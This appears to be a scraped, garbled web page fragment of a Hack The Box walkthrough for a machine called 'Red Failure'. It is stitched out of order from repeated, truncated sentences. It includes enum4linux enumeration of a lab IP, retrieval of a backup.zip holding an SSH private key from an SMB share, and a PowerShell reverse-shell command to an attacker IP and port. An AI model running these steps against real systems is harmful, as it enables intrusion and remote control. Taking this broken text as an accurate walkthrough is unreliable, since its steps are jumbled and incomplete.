Red Failure Htb !!link!! -
With elevated privileges, we can navigate to the Administrator's desktop and retrieve the flag:
Get-ChildItem -Path C:\Users\Administrator\Desktop -Filter *flag* Voilà! We've successfully exploited the Red Failure machine and obtained the flag. red failure htb
get backup.zip exit unzip backup.zip The unzip process reveals a file called id_rsa and a folder called .ssh . The id_rsa file is a private key that we can use for SSH authentication. With elevated privileges, we can navigate to the
.\Invoke-PowerShellTcpip.ps1 -Reverse -Ip 10.10.16.38 -Port 4444 With elevated privileges
enum4linux -a 10.10.11.193 The output reveals that there's a share called backup that we can access. Let's mount the share using smbclient :
Musical Cyberspace